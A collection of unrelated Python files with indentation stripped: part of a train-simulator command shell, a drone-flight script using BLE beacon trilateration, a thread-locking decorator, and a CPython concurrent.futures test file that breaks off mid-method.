global globalGrid, trainPosRow, trainPosCol, isDirty, train
dirs = { "north" : 0, "east" : 1, "south" : 2 , "west" : 3}
args = arg.split()
row = int(args[0])
col = int(args[1])
wagonCount = (int)(args[2])
entdir = (args[3])
if(not globalGrid):
print("Please create a grid before hand.")
return
if(globalGrid.grid[row][col].visuals == '_'):
print("Can not spawn on empty tile.")
return
# TODO: lock train mutex
train = globalGrid.spawnTrain(wagonCount, row, col)
train.enterCell(globalGrid.grid[row][col], dirs[entdir])
trainPosRow, trainPosCol = train.getEnginePos()
# unlock train mutex
isDirty = True
return
def do_advancetrain(self, arg):
'''
Advance the train using its current cell and dir, entercell must be used first.
Train disappears if it reaches an out-of-bounds, empty, or unconnected cell.
Usage: advancetrain
'''
global globalGrid, trainPosRow, trainPosCol, isDirty, train
# currCell = globalGrid.grid[train.enginePosRow][train.enginePosCol]
# nextCell = currCell.nextCell(dirs[entdir])
# needs mutex sync
if(not globalGrid):
print("Please create a grid before hand.")
return
canMove = train.advance()
if(canMove == False):
trainPosRow = -1
trainPosCol = -1
print("either unconnected, empty or out of bounds cell. Train will disappear")
else:
trainPosRow, trainPosCol = train.getEnginePos()
# needs mutex sync
isDirty = True
return
def do_getnextcell(self,arg):
'''
It prints the coordinates as row col and the type of the nextcell through entdir.
Usage: row col coordinates of currentcell, entdir for nextcell. Exp: 0 0 north
'''
dirs = { "north" : 0, "east" : 1, "south" : 2 , "west" : 3}
tupleArgs = arg.split()
global globalGrid
row = int(tupleArgs[0])
col = int(tupleArgs[1])
entdir = tupleArgs[2]
if(not globalGrid):
print("Please create a grid before hand.")
return
next = globalGrid.grid[row][col].nextCell(dirs[entdir])
if(next is None):
print("You are trying to access out of the bounds. There is nothing but uncertainty.")
else:
print(next.row, next.col, type(next))
def do_changeswitchstate(self, arg):
'''
It changes the state of the switch in order. Every call activates the next part, in CW order.
Usage: row col, Exp: 0 0
'''
# it gets the next state, the default state is the regular road. It follows the CW order.
tupleArgs = arg.split()
global globalGrid
row = int(tupleArgs[0])
col = int(tupleArgs[1])
if(not globalGrid):
print("Please create a grid before hand.")
return
cell = globalGrid.grid[row][col]
if(isinstance(cell, lib.SwitchRoad)):
cell.switchState()
print(cell.activePiece.visuals)
else:
print("The switch you are looking for is not here, please try again.")
return
def do_removeelm(self, arg):
'''
Replace cell with background cell at given row col. Exp: removeelm 1 2
'''
tupleArgs = parse(arg)
global globalGrid, isDirty
if(not globalGrid):
print("Please create a grid before hand.")
return
if(tupleArgs[0] < 0 or tupleArgs[0] >= globalGrid.row or tupleArgs[1] < 0 or tupleArgs[1] >= globalGrid.col):
print("Not existing cell!")
return
if(globalGrid.grid[tupleArgs[0]][tupleArgs[1]].visuals == '_'):
print("You cannot remove the background")
return
globalGrid.removeElement(tupleArgs[0], tupleArgs[1])
isDirty = True
def do_creategrid(self, arg):
'''
Create grid row x col. Exp: creategrid 3 4
**Note: Max displayable grid size is 5x9 due to image & screen size.
'''
#grid size can be 5 row*9 columns at most because of the screen limitations.
tupleArgs = parse(arg)
global globalGrid
if(tupleArgs[0] <=0 or tupleArgs[1] <= 0):
print("Sorry I can't print the nothingness :(")
return
if(tupleArgs[0] > 5 or tupleArgs[1] > 9):
print("Sorry, the municipilaty of screen does not allow us to built such a large structure :(")
return
globalGrid = lib.GameGrid(tupleArgs[0], tupleArgs[1])
def do_addelm(self, arg):
'''
It adds the given element at the given position.
Usage: addelm row col typeOfCell
typeOfCell(string): regular, switch1, switch2, switch3, bridge, levelcrossing, leftTurn, rightTurn, station
row,col (ints) are cell position. top left is row=0,col=0
Exp: addelm 0 0 regular
'''
splitArgs = arg.split()
row = int(splitArgs[0])
col = int(splitArgs[1])
typeStr = splitArgs[2]
global globalGrid
if(globalGrid is None):
print("Please first create a grid.")
return
if(row < 0 or row >= globalGrid.row or col < 0 or col >= globalGrid.col):
print("Please provide appropriate positions.")
return
newElm = None
if(typeStr == "regular"):
newElm = lib.RegularRoad(True, globalGrid)
elif(typeStr == "switch1"):
newElm = lib.SwitchRoad(1, globalGrid)
elif(typeStr == "switch2"):
newElm = lib.SwitchRoad(2, globalGrid)
elif(typeStr == "switch3"):
newElm = lib.SwitchRoad(3, globalGrid)
elif(typeStr == "bridge"):
newElm = lib.BridgeCrossing(globalGrid)
elif(typeStr == "levelcrossing"):
newElm= lib.LevelCrossing(globalGrid)
elif(typeStr == "leftturn"):
newElm = lib.RegularRoad(False, globalGrid)
newElm.makeLeftTurn()
elif(typeStr == "rightturn"):
newElm = lib.RegularRoad(False,globalGrid)
elif(typeStr == "station"):
newElm = lib.Station(globalGrid)
else:
print("typeOfCell(string) argument is invalid. Abort.")
return
globalGrid.addElement(newElm, row, col)
global isDirty
isDirty = True
def do_display(self, arg):
'''
Display the grid. You can follow the changes as long as you don't quit.
Please close the screen using the stopdisplay command, or use the bye command to quit the shell.
'''
global globalGrid
if(globalGrid is None):
print("Please create a grid first.")
return
global isDisplaying, displayThread,tell
if(isDisplaying == False):
displayThread = th.Thread(target= pygameDisplay, args=("adim emre", globalGrid.row, globalGrid.col))
displayThread.start()
isDisplaying = True
else:
if(tell):
print("display thread is already active. change windows")
def do_stopdisplay(self, arg):
'''
Stop the display and close the window. You can still use the commandline.
'''
global stopDisplay, isDisplaying, displayThread
if(isDisplaying == False):
return
# Display thread is monitoring this global flag to exit its inf loop.
if(displayThread is not None):
print("waiting for display thread to close.")
stopDisplay = True
displayThread.join()
isDisplaying = False
stopDisplay = False
print("display thread stopped. done")
def do_bye(self, arg):
'''
Close the trainSim window, and exit: BYE
'''
self.do_stopdisplay(arg)
print('Thank you for playing with trains! We hope you had fun :D')
self.close()
#bye()
return True
def precmd(self, line):
line = line.lower()
if self.file and 'playback' not in line:
print(line, file=self.file)
return line
def close(self):
if self.file:
self.file.close()
self.file = None
def parse(arg):
'Convert a series of zero or more numbers to an argument tuple'
return tuple(map(int, arg.split()))
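# e.g. parse("1 2") == (1, 2); parse("") == ()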
if __name__ == '__main__':
TrainSimCell().cmdloop() |
main_script.py | # -*- coding: utf-8 -*-
"""
Created on Thu Dec 12 09:16:45 2019
@author: pepo
"""
import libardrone
#import pygame
from time import sleep
import time
import cv2
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from threading import Thread
import os
import math
from shapely.geometry import LineString
from shapely.geometry import Point
from bluepy.btle import DefaultDelegate, Peripheral, Scanner
import seaborn as sns
import warnings
warnings.filterwarnings("ignore")
debug=True
drone = libardrone.ARDrone()
ds_test = pd.DataFrame()
ds_oper = pd.DataFrame()
p = Point(0,0)
running = True
route={'p0':Point(0,0),'p1':Point(1,0),'p2':Point(1,1)}
class ScanDelegate(DefaultDelegate):
def __init__(self):
DefaultDelegate.__init__(self)
def handleDiscovery(self, dev, isNewDev, isNewData):
"""if isNewDev:
print ("Discovered device", dev.addr)
elif isNewData:
print ("Received new data from", dev.addr)
"""
def handleNotification(self, cHandle, data):
print(data)
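# line_intersection() solves for the crossing point of two infinite lines,
# each given as a pair of points, using 2x2 determinants (Cramer's rule):
# the denominator det(xdiff, ydiff) is zero iff the lines are parallel;
# otherwise x = det(d, xdiff) / div and y = det(d, ydiff) / div, where d
# holds the per-line determinants of their defining points.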
def line_intersection(line1, line2):
xdiff = (line1[0][0] - line1[1][0], line2[0][0] - line2[1][0])
ydiff = (line1[0][1] - line1[1][1], line2[0][1] - line2[1][1])
def det(a, b):
return a[0] * b[1] - a[1] * b[0]
div = det(xdiff, ydiff)
if div == 0:
raise Exception('lines do not intersect')
d = (det(*line1), det(*line2))
x = det(d, xdiff) / div
y = det(d, ydiff) / div
return x, y
def setble(x,y,radius,clr):
return plt.Circle((x,y),radius,fc="none",edgecolor=clr)
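# returnpoint() approximates the receiver position from three beacon circles
# (centers (x_i, y_i) with RSSI-derived radii r_i). Each pair of overlapping
# circles yields two intersection points; the chords through those pairs are
# crossed with line_intersection() to pick a single fix. With only one
# overlapping pair, the midpoint of its two intersection points is used, and
# with no overlap at all the origin is returned as a failure marker.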
def returnpoint(x0,y0,r0,x1,y1,r1,x2,y2,r2):
result=calculateintersection(x0,y0,r0,x1,y1,r1)
result2=calculateintersection(x0,y0,r0,x2,y2,r2)
result3=calculateintersection(x1,y1,r1,x2,y2,r2)
if debug:
print("Intersection 0/1")
print(result)
print("Intersection 0/2")
print(result2)
print("Intersection 1/2")
print(result3)
time.sleep(5)
point=None
if len(result) > 0:
if len(result2) > 0:
message="case A: Circle 0&1 & 0&2 intersect"
point_int=line_intersection([(result[0],result[1]), (result[2],result[3])], [(result2[0],result2[1]), (result2[2],result2[3])])
point=Point(point_int[0],point_int[1])
elif len(result3) > 0:
message="case B: Circle 0&1 & 1&2 intersect"
point_int=line_intersection([(result[0],result[1]), (result[2],result[3])], [(result3[0],result3[1]), (result3[2],result3[3])])
point=Point(point_int[0],point_int[1])
else:
message="case G: Circle 0&1 intersect"
point=Point((result[0]+result[2])/2,(result[1]+result[3])/2)
elif len(result3) > 0 and len(result2) > 0:
message="case C: Circle 0&1 & 1&2 intersect"
point_int=line_intersection([(result2[0],result2[1]), (result2[2],result2[3])], [(result3[0],result3[1]), (result3[2],result3[3])])
point=Point(point_int[0],point_int[1])
elif len(result3) > 0:
message="case D: Circle 1&2 intersect: Medium point"
point=Point((result3[0]+result3[2])/2,(result3[1]+result3[3])/2)
elif len(result2) > 0:
message="case E: Circle 0&2 intersect: Medium point"
point=Point((result2[0]+result2[2])/2,(result2[1]+result2[3])/2)
else:
message="case F: No intersection ERROR no signal"
point=Point(0,0)
#x = np.linspace(0, 1, 100000)
"""fig, ax = plt.subplots(figsize=(12, 10))
plt.grid(linestyle='--')
ax.set_aspect(1)
ax.add_artist(setble(x0,y0,r0,"r")) # Beacon1
ax.add_artist(setble(x1,y1,r1,"g")) # Beacon2
ax.add_artist(setble(x2,y2,r2,"b")) # Beacon3
if len(result) >0:
ax.add_artist(setble(result[0],result[1],0.01,"b")) # Samsung
ax.add_artist(setble(result[2],result[3],0.01,"b")) # Samsung
if len(result2) >0:
ax.add_artist(setble(result2[0],result2[1],0.01,"b")) # Samsung
ax.add_artist(setble(result2[2],result2[3],0.01,"b")) # Samsung
if len(result3) >0:
ax.add_artist(setble(result3[0],result3[1],0.01,"b")) # Samsung
ax.add_artist(setble(result3[2],result3[3],0.01,"b")) # Samsung
ax.add_artist(setble(point.x,point.y,0.01,"r"))
"""
if debug:
print(message)
return point
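# Standard two-circle intersection: a is the distance from (x0, y0) to the
# chord joining the crossing points, h is the half-chord length. Returns
# [x1, y1, x2, y2] for the two crossing points, or [] when the circles are
# separate or one contains the other.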
def calculateintersection(x0,y0,r0,x1,y1,r1):
EPSILON = 0.000001  # tolerance, currently unused
dx = x1-x0
dy = y1-y0
d=math.sqrt((dy*dy)+(dx*dx))
if d>r0+r1:
return []
if d < abs(r0-r1):
return []
a = ((r0*r0) - (r1*r1) + (d*d)) / (2.0 * d)
point2_x = x0 + (dx * a/d)
point2_y = y0 + (dy * a/d)
h = math.sqrt((r0*r0) - (a*a))
rx = -dy * (h/d)
ry = dx * (h/d)
intersectionPoint1_x = point2_x + rx
intersectionPoint2_x = point2_x - rx
intersectionPoint1_y = point2_y + ry
intersectionPoint2_y = point2_y - ry
return [intersectionPoint1_x,intersectionPoint1_y,intersectionPoint2_x,intersectionPoint2_y]
def inverse(x):
return x*(-1)
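# One BLE scan pass: collect RSSI readings for the three known beacons,
# normalise RSSI into the [0, SCALE] range as a rough distance proxy, then
# trilaterate a position. MIN, MAX and SCALE are calibration constants for
# the deployment, and the MAC addresses identify the fixed beacons.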
def get_current_position():
MIN=30
MAX=100
SCALE=1.3
scanner = Scanner().withDelegate(ScanDelegate())
devices = scanner.scan(1.9)
devlist=['30:ae:a4:9c:e7:c2','30:ae:a4:97:6c:26','30:ae:a4:9c:8f:a2']
global ds_test
for dev in devices:
if dev.addr in devlist:
# print("ADDR: %s" % (dev.addr))
data = [[time.time(),dev.addr,-1*dev.rssi,dev.iface,dev.addrType,dev.getValueText(1),dev.getValueText(10),dev.getValueText(255)]]
#data = [[time.time()]]
ds_test=ds_test.append(data)
#print("bucle: %d" % len(ds_test))
if len(ds_test) == 0:
return None
# else:
# print("bucle: %d" % (len(ds_test[ds_test[2]>=MIN])))
# print("bucle2: %d" % len(ds_test))
# return None
ds_test=ds_test[ds_test[2]>=MIN]
if debug:
print("bucle2: %d" % len(ds_test))
print(len(ds_test[ds_test[0]-(time.time())<2000]))
#ds_test["rssi_norm"]=MAX-ds_test[2]
ds_test["rssi_norm"]=(ds_test[2]-MIN)/(MAX-MIN)
#ds_test["rssi_norm"]=1-ds_test["rssi_norm"]
ds_test["rssi_norm"]=ds_test["rssi_norm"]*SCALE
ds_test_b3=ds_test[ds_test[1]=="30:ae:a4:97:6c:26"] # 3
ds_test_b1=ds_test[ds_test[1]=="30:ae:a4:9c:e7:c2"] # 1
ds_test_b2=ds_test[ds_test[1]=="30:ae:a4:9c:8f:a2"] # 2
ds_b1 = 0
ds_b2 = 0
ds_b3 = 0
if len(ds_test_b1) > 0 and time.time()-ds_test_b1.iloc[-1][0] < 10:
ds_b1 = ds_test_b1.iloc[-1]["rssi_norm"]
if len(ds_test_b2) > 0 and time.time()-ds_test_b2.iloc[-1][0] < 10:
ds_b2 = ds_test_b2.iloc[-1]["rssi_norm"]
if len(ds_test_b3) > 0 and time.time()-ds_test_b3.iloc[-1][0] < 10 :
ds_b3 = ds_test_b3.iloc[-1]["rssi_norm"]
print("Beacon 1: %s" % (ds_b1))
print("Beacon 2: %s" % (ds_b2))
print("Beacon 3: %s" % (ds_b3))
if debug:
print("Summary:")
print("#########")
print("len ds_test %d" % (len(ds_test)))
print(ds_b1)
print(ds_b2)
print(ds_b3)
print("#########")
print("Position 1: %s" % (ds_b1))
print("Position 2: %s" % (ds_b2))
print("Position 3: %s" % (ds_b3))
point=returnpoint(0,0,ds_b1,0,1,ds_b2,1,0.5,ds_b3)
if point is None:
point = Point(0,0)
data = [[time.time()*1000,str(point.x),str(point.y),0,0,ds_b1,0,1,ds_b2,1,0.5,ds_b3]]
temp = pd.DataFrame(data)
temp.to_csv('/home/pepo/Documents/nissan_code/Loc_csv.csv',mode='a', header=False)
return point
def get_info():
print('Battery %i%%' % drone.navdata.get(0,dict()).get('battery',0))
print('State %i' % drone.navdata.get(0,dict()).get('ctrl_state',0))
print('Theta %i' % drone.navdata.get(0,dict()).get('theta',0))
print('Phi %i' % drone.navdata.get(0,dict()).get('phi',0))
print('PSI %i' % drone.navdata.get(0,dict()).get('psi',0))
print('Altitude %i' % drone.navdata.get(0,dict()).get('altitude',0))
print('vx %i' % drone.navdata.get(0,dict()).get('vx',0))
print('vy %i' % drone.navdata.get(0,dict()).get('vy',0))
print('vz %i' % drone.navdata.get(0,dict()).get('vz',0))
def get_detail(name):
return drone.navdata.get(0,dict()).get(name,0)
def takeoff(height):
# height is currently unused; drone.takeoff() climbs to the firmware default
drone.takeoff()
def move_left(secs):
drone.move_left()
sleep(secs)
def move_right(secs):
drone.move_right()
sleep(secs)
def turn_right(secs):
drone.turn_right()
sleep(secs)
def turn_left(secs):
drone.turn_left()
sleep(secs)
def move_ff(secs):
drone.move_forward()
sleep(secs)
def move_back(secs):
drone.move_backward()
sleep(secs)
def move_up(secs):
drone.move_up()
sleep(secs)
def move_down(secs):
drone.move_down()
sleep(secs)
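# Background thread: keep refreshing the shared position estimate `p` while
# the main loop runs; `threadname` is only a label and is otherwise unused.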
def threadlocation(threadname):
global p
global running
while running:
p = get_current_position()
if debug:
print(p)
if p is None:
p = Point(0,0)
os._exit(0)
def main():
global running
cam = cv2.VideoCapture('tcp://192.168.1.1:5555')
#drone = libardrone.ARDrone()
drone.takeoff()
while running:
# get current frame of video
running, frame = cam.read()
str_image = ("Location: X(%s) , Y(%s) \n Battery: %s \n Height: %s" % (str(round(p.x,2)),str(round(p.y,2)),str(get_detail('battery')),str(get_detail('altitude'))))
font=cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(frame,str_image,(0,30),font,0.5,(0,255,0),1,cv2.LINE_AA,bottomLeftOrigin=False)
#print(get_current_position())
if running:
cv2.imshow('frame', frame)
if cv2.waitKey(1) & 0xFF == 27:
# escape key pressed
running = False
print("Exit requested")
else:
# error reading frame
print ('error reading video feed')
drone.land()
cam.release()
cv2.destroyAllWindows()
os._exit(0)
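# Waypoint follower: walk through `route` in order, compare the latest
# position estimate against each target and log the direction the drone
# would need to move (F/B and L/R); movement commands are not issued here,
# only printed and optionally logged to CSV.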
def inittrack():
THRESHOLD=0.002
global p
global ds_oper
items=len(route)
i=0
while i<items:
name = 'p'+str(i)
target = route[name]
print("Situation")
print("Target X: %s Y: %s" % (str(target.x),str(target.y)))
print("Position X: %s Y: %s" % (str(p.x),str(p.y)))
print("Distance:")
print("X: %s Y: %s" % (str(p.x-target.x),str(p.y-target.y)))
a=p.x-target.x
b=p.y-target.y
op=""
if abs(a)<THRESHOLD and abs(b)<THRESHOLD:
i=i+1
print("point found")
if a>0:
op=op+"B"
print("move backwards")
else:
op=op+"F"
print("move forwards")
if b<0:
op=op+"R"
print("move right")
else:
op=op+"L"
print("move left")
data = [[time.time()*1000,str(target.x),str(target.y),str(p.x),str(p.y),op]]
temp = pd.DataFrame(data)
# temp.to_csv('/home/pepo/Documents/nissan_code/Loc_csv.csv',mode='a', header=False)
time.sleep(2)
if __name__ == '__main__':
try:
drone.trim()
drone.speed = 0.2
if False:
thread_loc = Thread(target=threadlocation, args=['t1'])
thread_loc.start()
if False:
thread_main = Thread(target=main, args=[])
thread_main.start()
# inittrack()
print("take off")
drone.takeoff()
sleep(5)
print("move up")
drone.move_up()
sleep(5)
print("move left")
drone.move_left()
sleep(3)
print("hover")
drone.hover()
sleep(1)
print("move down")
drone.move_down()
sleep(5)
print("move right")
drone.move_right()
sleep(3)
print("hover")
drone.hover()
sleep(1)
# sleep(1)
print("land")
drone.land()
except (SystemExit,KeyboardInterrupt):
drone.land()
drone.halt()
print("Drone aborted")
except Exception:
drone.land()
drone.halt()
print("Drone aborted on exception")
drone.halt() |
concurrency.py | from threading import Thread
from rx3.core.typing import StartableTarget
def default_thread_factory(target: StartableTarget) -> Thread:
return Thread(target=target, daemon=True)
def synchronized(lock):
"""A decorator for synchronizing access to a given function."""
def wrapper(fn):
def inner(*args, **kw):
with lock:
return fn(*args, **kw)
return inner
return wrapper
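# Illustrative sketch (not part of the original module): serialising access
# to a shared counter; `shared` and `bump` are hypothetical names.
#
# from threading import RLock
# _lock = RLock()
# shared = {"n": 0}
#
# @synchronized(_lock)
# def bump():
#     shared["n"] += 1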
|
test_concurrent_futures.py | import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
test.support.import_module('threading')
from test.support.script_helper import assert_python_ok
import os
import sys
import threading
import time
import unittest
import weakref
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future)
from concurrent.futures.process import BrokenProcessPool
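# Test helper: fabricate a Future frozen in an arbitrary lifecycle state by
# setting its private attributes directly, bypassing the executor machinery.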
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
def mul(x, y):
return x * y
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
class MyObject(object):
def my_method(self):
pass
class ExecutorMixin:
worker_count = 5
def setUp(self):
self.t1 = time.time()
try:
self.executor = self.executor_type(max_workers=self.worker_count)
except NotImplementedError as e:
self.skipTest(str(e))
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
dt = time.time() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 60, "synchronization issue: test lasted too long")
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
t = {executor_type}(5)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._threads), 3)
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
test.support.gc_collect()
for t in threads:
t.join()
class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
del executor
test.support.gc_collect()
queue_management_thread.join()
for p in processes.values():
p.join()
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, unittest.TestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
newgil = hasattr(sys, 'getswitchinterval')
if newgil:
geti, seti = sys.getswitchinterval, sys.setswitchinterval
else:
geti, seti = sys.getcheckinterval, sys.setcheckinterval
oldinterval = geti()
seti(1e-6 if newgil else 1)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
seti(oldinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests, unittest.TestCase):
pass
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
future1 = self.executor.submit(time.sleep, 2)
completed = [f for f in futures.as_completed([future1,future1])]
self.assertEqual(len(completed), 1)
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, unittest.TestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
